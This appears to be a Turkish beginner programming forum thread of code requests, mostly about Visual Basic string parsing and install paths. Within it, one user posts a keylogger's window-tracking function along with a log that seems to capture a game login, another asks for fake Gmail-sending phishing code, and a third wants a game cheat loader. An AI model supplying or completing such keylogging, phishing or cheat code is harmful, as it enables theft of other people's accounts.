Hazır Kod İstekleriniz

azazil66
Çırak
sa arkadaslar ben vb ogrenmeye yeni basladım mıcrosoft visual sdudıo 2010 experess yazıyo ordanda mıcrosoft visual C#2010 express e gırıyorum program acılıyo fakat sızn anlattgnzdan we benım az cok ogrendklermdn dgsk deneme surumu falan mı ne yapmalıym şmdı guzel bı yardım edersenz bu dostnuzu kazanms olursunz tesk.ler şmdıden:)

HeaveNTr
Çırak
ustalar gelen loglar ==========örnek=========site=========metin2====den eme=======[Tab]============12344========[Enter]=========

gibi gelıo mesela bunu söyle yapmak istiyorum

metin2
Deneme[Tab]12344[Enter]
giibi alt alta düzgün şekilde gelmesi için ne yapmalıyım ? kullandıgım log gönderiş kodu da şu =
Function TypeWindow()
Dim Handle As Long
Dim textlen As Long
Dim WindowText As String

Handle = GetForegroundWindow
LastHandle = Handle
textlen = GetWindowTextLength(Handle) + 1

WindowText = Space(textlen)
svar = GetWindowText(Handle, WindowText, textlen)
WindowText = Left(WindowText, Len(WindowText) - 1)

If WindowText <> LastWindow Then
If Form1.Text1 <> "" Then Form1.Text1 = Form1.Text1 & vbCrLf & vbCrLf
Form1.Text1 = Form1.Text1 & "==============================" & vbCrLf & WindowText & vbCrLf & "==============================" & vbCrLf
LastWindow = WindowText
End If
End Function

bana bi yardımcı olur msunuz lütfen şimdiden teşekkürler..

mesaj olarak da atarsanız sevinirim çünkü yaylada net yok :D

YazılımMimarı
Forum Ustası
Regex ile sentezleyip, split metodu ilede bir array in içine doldurmalısın. Sonrada writeln ile array i bir döngü içine sokup teker teker elemanlarını yazdırman yeterli olacaktır.

YazılımMimarı
Forum Ustası
Visual Basic bilmem pekte haz etmem kod syntax'ından genel olarak ne yapman gerektiğini söyledim.

Java kodunu paylaşabilirim, daha önce biri istemişti bu tip bir şey vermiştim.

FileInputStream fstream = new FileInputStream("C:\\abc.txt");
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
FileWriter fstream = new FileWriter("istenilen.txt");
BufferedWriter out = new BufferedWriter(fstream);

String strLine;
String[] type;

while ((strLine = br.readLine()) != null) { // Satır Satır okuma işlemi
type = strLine.split(" "); // Burada regex olarak boşluk aldım sendeki veriye göre
type=strLine("\\========="); bu tip bir regex işini görür
out.write(type[0]+"\n"); // senin gösterimindeki örnek yazısını alır
out.write(type[1]+"\n"); // Buda site kısmını
//Deneme[Tab]12344[Enter] bu şekilde bir yapı için "\n" alt satıra atlatır (Enter karakteri) kullanmazsan yeterli olur.

}
Genel algoritması budur.

darkdede61
Çırak
Kardeşim acaba fake kodlarını paylaşırmısın buttona tıklayınca direk olarak gmaile göndercek text1 ile text2 deki yazıyı vea sourcesini bekliyorum

alfie70
Çırak
Bir web sayfasının içeriğini html kodu olarak bir texboxa aktarıyorum. Bu textboxın içinden <ADRES>Izmit Yalova Yolu GOLCUK KOCAELI</ADRES> kısmındaki sadece adres tarifi olan kısmı almak istiyorum. Ve aldığım bu adresi başka bir texboxa aktarmak istiyorum.

Teşekkür ederim.
Not: Texbox içinde <ADRES> yazısının kaçıncı karakterde bittiğini ve </ADRES> yazısının nerede başladığını buldum. İş sadece aradaki adresi kopyalamaya kaldı.

tr-c0d3r
Çırak
Bır buton ekle ve su kodları yaz kardesım.

Kod:
Private Sub Command1_Click()
    Dim delimiter1, delimiter2, sonuc As String
    Dim dl1_len As Integer
    Dim icerik As String
    Dim a, b As Integer
    icerik = "lay lay lom vıdı vıdı vıdı<adres>Gurbet gurbet gezer dıyar dıyar ellere..!</adres> deneme abıdık gubıdık"
    delimiter1 = "<adres>"
    delimiter2 = "</adres>"
    dl1_len = Len(delimiter1)
    a = InStr(icerik, delimiter1)
    If a > 0 Then
        a = a + dl1_len
        b = InStr(a, icerik, delimiter2)
        MsgBox Mid(icerik, a, b - a)
    End If
End Sub
Sadece ornek olması acısından boyle bırsey yaptım.

cebim
Daimi Üye
Geçenlerde yeni bir laptop aldık windows 7 yüklü laptop da program files ve program files (x86) mevcut. yaptığım projeye yol göstererek C:\Program Files diyerek yol gösterdim ve laptop da çalışmadı. Farklı bir pc de yine windows 7 yüklü onda sadece program files var onda çalıştı. Program konum bulma hususunda sorun yok fakat çalışan bir program filese dosya göndermem şart

yapmak istediğime gelince kendim hazırlayacağım bir setup olacak ben bu setup a direk program files göstersem her pc de olacak ama program files (x86) olan pc de olmayacak benim pc de 32 bit işlemci var windows 7 64 bit ise program files a 32 bit ise program files (x86) ya gönderiyor muş ben setup da bunu otomatik buldurmam gerek nasıl yaparım.

biraz karışık oldu gibi kusura bakmayın

kısacası setup u kendim yapacağım program files i direk bulsun windows 7 de sorun çıkmasın istiyorum

ßy -0rJinaL
Çırak
Geçenlerde yeni bir laptop aldık windows 7 yüklü laptop da program files ve program files (x86) mevcut. yaptığım projeye yol göstererek C:\Program Files diyerek yol gösterdim ve laptop da çalışmadı. Farklı bir pc de yine windows 7 yüklü onda sadece program files var onda çalıştı. Program konum bulma hususunda sorun yok fakat çalışan bir program filese dosya göndermem şart

yapmak istediğime gelince kendim hazırlayacağım bir setup olacak ben bu setup a direk program files göstersem her pc de olacak ama program files (x86) olan pc de olmayacak benim pc de 32 bit işlemci var windows 7 64 bit ise program files a 32 bit ise program files (x86) ya gönderiyor muş ben setup da bunu otomatik buldurmam gerek nasıl yaparım.

biraz karışık oldu gibi kusura bakmayın

kısacası setup u kendim yapacağım program files i direk bulsun windows 7 de sorun çıkmasın istiyorum

Text1.Text = Environ("ProgramFiles") & "\" & App.ProductName

buyur kardeşim basit ve kısa

daraske
Çırak
Knight Online 1886 Koxpun Yükleme Butonu Lazım Yani Clientin Adını Yazıp Yükle Dediğimde Koxpu Hazır Hale Getirebilmeli

Lütfen Pointerler Ve Offsetler Güncel Olsun